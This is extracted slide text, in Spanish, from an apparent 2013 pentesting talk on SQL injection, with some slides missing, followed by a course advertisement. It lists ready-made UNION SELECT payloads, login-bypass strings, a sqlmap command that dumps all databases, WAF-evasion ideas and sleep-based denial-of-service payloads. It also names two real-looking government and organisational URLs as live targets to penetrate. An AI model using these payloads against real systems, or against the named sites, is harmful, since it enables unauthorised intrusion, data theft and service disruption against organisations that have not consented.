El documento habla sobre inyecciones SQL avanzadas y automatizadas, incluyendo temas como la identificación de vulnerabilidades, la estructuración básica de una inyección, cómo blindar las inyecciones, automatizarlas y evadir firewalls web. También cubre cómo hacer bypass de logs, extraer bases de datos y vulnerar servidores gubernamentales.
1. Inyecciones SQL Avanzadas y
automatizadas.
www.n3xasec.com
Pentester Rafael Gómez Del Ángel
Director de N3XAsec
Docente de la certificación:
SIOHE Seguridad Informática Ofensiva Hacking Etico
2. TEMAS QUE VEREMOS EN LA PONENCIA
1.- Identificación de la vulnerabilidad
2.-Estructuración básica de una inyección
3.-Blindando las inyecciones
4.-Automatizando las inyecciones
5.-Evadiendo Firewall Web
6.-Loggin Bypass
7.-Dumpeando la base de datos
8.-Vulnerando servidores de GOBIERNO
9.-Ataques DOS SQLI
3. ¿Que es una inyección SQL ?
Inyectar
Inyectar
AQUI !!
AQUI !!
www.victima.com/index.php?idVulnerable=34
GET
POST
5. Estructura básica de una inyección
Una inyección esta compuesta básicamente 3 partes:
1.-La sintaxis en lenguaje SQL, union+all+select,
2.-Busqueda de numero de tablas 1,2,3,4,5,6,7....
(NULL,NULL,NULL)
3.- El comando a ejecutar o los datos a obtener @@version
id_vulnerable=73+UNION+ALL+SELECT 1,2,3 */*
id_vulnerable=73+UNION+ALL+SELECT 1,2,@@version*/*
id_vulnerable=73' LIMIT 1,1 UNION ALL SELECT NULL, NULL,
CONCAT(0x3a626e653a,0x4f536a56435074746677,0x3a626c713a), NULL, NULL,
NULL, NULL#
10. LOGGIN BY PASS!!
Para pasarnos un loggin Se utiliza la sentencia OR ya
que esta significa que si algo es verdadero entonces
todo será verdadero OR 1=1 . Esto provocará que
automáticamente toda la consulta sea verdadera, sea
cual sea el usuario.
1.- V or V = VERDADERO-------------------- ‘’OR 1=1 /* ‘
2.- V or F = VERDADERO-------------------- “OR 1=0 /* ‘
3.- F or V = VERDADERO-------------------- “OR 0=1 /* ‘
4.- F or F = FALSO----------------------------- “OR 0=0 /* ’
11. LOGGIN BY PASS!!
admin’ - -
admin’ #
admin ‘ /*
‘ or 1=1- -
‘ or 1=1#
‘ or 1=0/*
‘) or 1=0
‘1’=‘1- -
‘) or 1=1
(‘1’=‘1 - -
‘) */ 1=0 #
12.
13. Penetrar un servidor en VIVO
http://salud.edomexico.gob.mx/html/index.php
http://ddsisem.dyndns.org/activo_fijo/login.php
14. WAF
WAF Web Application Firewall
Web Application Firewall
17. Char Encode
Útil para evadir detección de palabras
El atacante sabe que existen filtros que evitara la llegada de la
inyección al servidor, el usara una combinación de caracteres y
encriptaciones para saltarse los filtros y el IDS lo reconozca como
validos.
22. Dumpleando la BD
Dumpleando la BD
./sqlmap.py -u www.xxx.sp.php?id=666 --dump -all
VIDEO
23. Ataques DOS por inyección SQL
Este ataque se genera cuando mandamos una consulta
MAL formada, de tal manera que cuando el servidor la
interprete cause un conflicto interno o “Se confunda”
Id?=66+Union,concat(0x3,slep(10000000),0x3) */#--
')OR'#1='2--
#Select+from,--
'(#')-- OR +FROM--
27. GRACIAS!!! ¿ Dudas ?
INSCRIPCIONES
ABIERTAS Diplomado para SIOHE Seguridad Informática
Ofensiva Hacking Etico
INICIO 15 DE MAYO
2013
Plan de financiamiento
Informes :
info@n3xasec.com
Descarga de material y diapositivas
www.n3xasec.com